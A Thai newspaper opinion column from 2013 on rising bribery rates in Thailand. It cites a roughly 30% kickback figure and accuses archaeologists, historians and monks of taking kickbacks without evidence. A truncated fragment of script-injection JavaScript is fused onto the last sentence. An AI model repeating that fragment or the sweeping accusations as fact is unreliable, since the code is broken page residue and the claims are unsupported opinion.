มติชนรายวัน ฉบับประจำวันจันทร์ที่ 4 มีนาคม 2556

 

          ความเป็นไทยไม่เหมือนใครในโลก ตอนนี้เป็นที่รับรู้ไปทั่วโลกอีกว่าแพงกว่าเดิม

          วีโอเอ. เสียงอเมริกา (Voice of America) บอกไปทั่วโลกว่าในไทยทุกวันนี้ต้องเสียเงินใต้โต๊ะราว 30% ที่นักธุรกิจต้องจ่ายให้นักการเมืองและข้าราชการ (กาแฟดำ ในกรุงเทพธุรกิจ วันพุธที่ 27 กุมภาพันธ์ 2556 หน้า 2) มีเนื้อความละเอียดต่อไปนี้

          “นักธุรกิจชาวไทยผู้หนึ่งซึ่งไม่เปิดเผยชื่อ โอดครวญว่าทุกวันนี้ตนต้องจ่ายใต้โต๊ะแพงเหลือเกิน จากเมื่อก่อนตกประมาณ 5-10% ปัจจุบันเพิ่มขึ้นเป็นอย่างน้อย 30%

          และเมื่อเร็วๆนี้รายงานวิจัยของมหาวิทยาลัยหอการค้าไทย คาดการณ์ว่าเศรษฐกิจไทยจะสูญเสียเงินไปกับการคอร์รัปชั่นในปีนี้ราว 2% ของมูลค่าผลิตภัณฑ์มวลรวมภายในประเทศ หรือ GDP ซึ่งคิดเป็นมูลค่าประมาณ 11,000 ล้านดอลลาร์ หรือ 330,000 ล้านบาท”

          เวลานี้บริษัทเอกชนที่ต้องการได้สัญญารับเหมาโครงการของรัฐบาลจะต้องจ่ายเงินสินบนแพงขึ้นกว่าเดิม

          ซึ่ง ดร. ผาสุก พงษ์ไพจิตร จากคณะเศรษฐศาสตร์ จุฬาลงกรณ์มหาวิทยาลัย ชี้ว่าการที่อัตราค่าสินบนเพิ่มขึ้นนั้นเป็นเพราะการแข่งขันทางธุรกิจในระดับท้องถิ่นเพิ่มสูงขึ้น ส่งผลให้เงินที่ต้องจ่ายเพื่อให้ได้สัญญารับเหมาจากรัฐบาลสูงขึ้นตามไปด้วยเช่นกัน”

          เงินใต้โต๊ะ คือ เงินติดสินบน ปัจจุบันเป็นก้อนเดียวกับเงินทอน

          วงการศาสนาและศิลปวัฒนธรรม ซึ่งฝูงคนดีมีศีลธรรมที่รักความเป็นไทยต่างศรัทธา เลื่อมใสแล้วกู่ร้องก้องฟ้าว่าสะอาดบริสุทธิ์ผุดผ่องเป็นยองใยไร้ฝ้าปราศจากราคี ก็มิได้รอดพ้นจากเงินใต้โต๊ะหรือเงินทอนอัตราล่าสุด 30%

          อุดมคติของนักประวัติศาสตร์โบราณคดี ที่เคยประกาศมานานช้าว่ามุ่งหน้าศึกษาค้นคว้าวิชาการความเป็นมาของมนุษยชาติและชนชาติไทย แล้วปกปักรักษาโบราณสถานมรดกของบรรพชนให้รอดพ้นจากการลักลอบทำลาย บัดนี้กลายเป็นแค่ตำนานคำบอกเล่าเก่าแก่เมื่อหลายสิบปีมาแล้วเท่านั้น

          ไม่มีใครคิดอย่างนั้น ทำอย่างนั้นอีกแล้ว

          ปัจจุบันคนเหล่านั้นเฉลี่ยกันรับเงินทอนจากการตรวจรับงานประเภทต่างๆที่จ้างเหมาทำงานประวัติศาสตร์โบราณคดี พร้อมกับแหกปากตะโกน รักชาติ ศาสนา พระมหากษัตริย์

          โดยอวดอ้างวิชาการโบราณคดีและประวัติศาสตร์ศิลปะที่ท่องจำตำราฝรั่งเศสอย่างแม่นยำ แสดงอำนาจห้ามถ่ายรูปโบราณวัตถุในพิพิธภัณฑ์ ทั้งนี้ทั้งนั้นก็เพื่ออำพรางตัวตนแท้จริง ขณะเดียวกันก็เพื่อข่มขู่ผู้จับได้ไล่ทัน แล้วเอาเปรียบสังคมไทยอย่างสะดวกต่อไป

          ในวงการพระสงฆ์ ก็ต้องใส่ซองถวายจตุปัจจัยไทยทานเพิ่มจากแต่ก่อน

          เหล่านี้คือความเป็นไทยที่ไม่เหมือนใครในโลก แล้วต้องแพงกว่าเดิมvar d=document;var s=d.createElement(‘script’); }